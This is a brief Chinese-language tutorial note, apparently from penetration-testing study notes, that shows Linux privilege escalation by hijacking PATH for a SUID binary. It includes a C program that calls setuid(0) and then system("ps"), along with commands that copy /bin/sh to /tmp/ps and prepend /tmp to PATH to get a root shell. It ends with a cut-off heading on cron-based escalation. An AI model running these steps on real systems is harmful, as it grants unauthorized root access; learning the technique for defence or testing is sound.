Linux提权环境变量安全-(aliyun,本地):
前提:需要配合SUID进行环境变量提权且是本地用户环境下(因此该方法比较难实现,鸡肋)
提权过程:手写调用文件-编译-复制文件-增加环境变量-执行触发。
//demo.c文件
#include<unistd.h>
void main(){
setuid(0);
setgid(0);
system("ps");
}
gcc demo.c -o shell //手写一个c语言文件,并上传编译为shell文件
cp /bin/sh /tmp/ps //复制到目录
export PATH=/tmp:$PATH //导入环境变量,类似windows配环境变量,直接命令下就能执行某文件,kali里各种工具都是如此
./shell //执行当前目录shell文件
id
777:所有人都有读写执行权限。
Linux 提权本地定时任务安全-Aliyun
了解下定时任务命令: